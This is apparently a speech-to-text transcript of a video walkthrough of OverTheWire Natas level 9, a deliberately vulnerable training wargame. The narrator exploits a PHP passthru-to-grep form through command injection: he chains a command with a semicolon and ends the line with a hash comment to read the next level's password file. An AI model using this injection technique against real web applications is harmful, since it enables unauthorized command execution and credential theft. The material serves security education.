Python Web Hacking: PHP Command Injection | Natas: OverTheWire (Level 9)

Key Takeaways

what's up guys John Hammond here coming back at you with another video for the natus war game from over the wire so we just got the password for level 9 and we've got a script that will get the webpage content for us so we don't have to use a web browser and this one looks like it's saying alright natus 9 here's a form you can find words containing and inputs just regular text variable looks like with the variable name needle and it looks like it'll search for us the output is displayed in pre formatted text and we could probably see that in the web browser if we really wanted to let's do that just so you get an idea of what this level looks like natus 9 and thatis 9 and you can see there is another option here to view source code so we can check that out index source HTML that was the name of the file and we can do that in our sublime text stuff if we really wanted to we could decode that if we wanted to or we can just view it in the web browser so it'll handle that a little bit nicely ok so looks like PHP code the notes here with variables with a dollar sign and all key is apparently set to whatever we post to whatever is requested once we communicate with the server and if key is not an empty string it will pass through hmm what is that looks like a function pass through I'll check that out and it's oh it looks like it might be running a command here grep so like we've kind of done in the command line with the bash shell grep whatever we pass to it nice key in dictionary text dictionary text must be a word that's trying to are dictionary that it's looking through what is the PHP pass-through function is it literally just gonna run a command for us yes it will totally just execute commands and display output okay so we could potentially have remote code execution here and we can totally get in the way of it because we're just passing in raw arguments to this thing so if we wanted to find words that say like ten words containing a p-- okay all of these things in dictionary dot txt Apple obviously right what's etc so we can put more in here like how about a period so grep will use the regular expressions here and that will return a period from period will match everything just like regular expressions will match any character so it returned the entire dictionary text file but since we're supplying this as an argument that you can see went through without any like quotes or surrounding it to specify that that as a single argument we could bleed into other arguments here and specify other files that we want to read or change up how this command works let's take a look and let's do that in our shell here or are our sublime text script needle can be app to see if we get responses let's run this we don't want to go to index source anymore we want to be posting it to the actual page and we're getting all of this output so can we return anything with the period huh okay I must be getting some strange characters out so let's go a let's just app huh maybe some maybe some strange characters are in this dictionary that Python does not want to render for us we can change the encoding here coding equals utf-8 that's the magic magic Python syntax to suddenly be okay with Unicode characters will that work for us no okay man that's super annoying let's do this with the verb browser then I suppose at least let's figure out our attack let's say we can actually return anything and if we get a space in between this we can actually ask for another file that we want to look through I think right let's go to natus pass and we want natus 10 right search looks like it returns from the file that things matched in but the naty's password file should get a result it should have matched at some point let's check out what's control f4 natus 9 that is 10 no luck huh was it in etc is it just gonna display anything for us that's not dictionary dot txt it doesn't look like there's any other notion of natus no so maybe that didn't work okay well we still have command execution right can we do period or like anything from nowhere yep nothing nothing from nowhere and use a comment to end the and what we're in and the rest of the line here so it doesn't put in that dictionary dot txt for us but we use the semicolons to note a new command right ok cool so we've got command injection just like that so now we should just be able to cat natus pass natus 10 is that not the is that not the right location a little wire what the heck over the wire log over the wild org what am i doing maddis etc natus web pass oh I'm a fool so the old attack probably would have worked just fine Matis web paths natus 10 yeah oh jeez it totally would have worked just fine except I'm an idiot I'm sorry I didn't even realize that path guys I thought it was the same syntax as the other war games well hey okay that's done for us right there's the attack we can return anything and let's just get something that we know is in here actually no we can just say anything and then we can still use a comment to not include the not include the dictionary text file natus web Pass natus 10 and use the hash tag here so we won't return the rest of the responses from the dictionary text file we commented out the rest of that command here so now we've got our password loaded or displayed out to us and let's use our regular expressions here to carve it out just like that we get our password and we are good to go so natus 9 is done we can put this in the script for natus 10 and just like that we are ready to move on so I hope you guys hope that made sense a little bit of command injection because that that code was just being passed through two real command like a bath shell and executing it and we can just kind of wrap around the arguments or and do some unique things with it and we can load content from other files because that's the way grep works and we can use other bash syntax stuff like comments or other commands with the semicolon to do other interesting things so cool hack cool vulnerability there and that's the real thing command injection is for sure a real problem in web security stuff so okay now they filter on certain certain characters huh let's get start on that in the next video guys thank you guys for watching hope you're enjoying these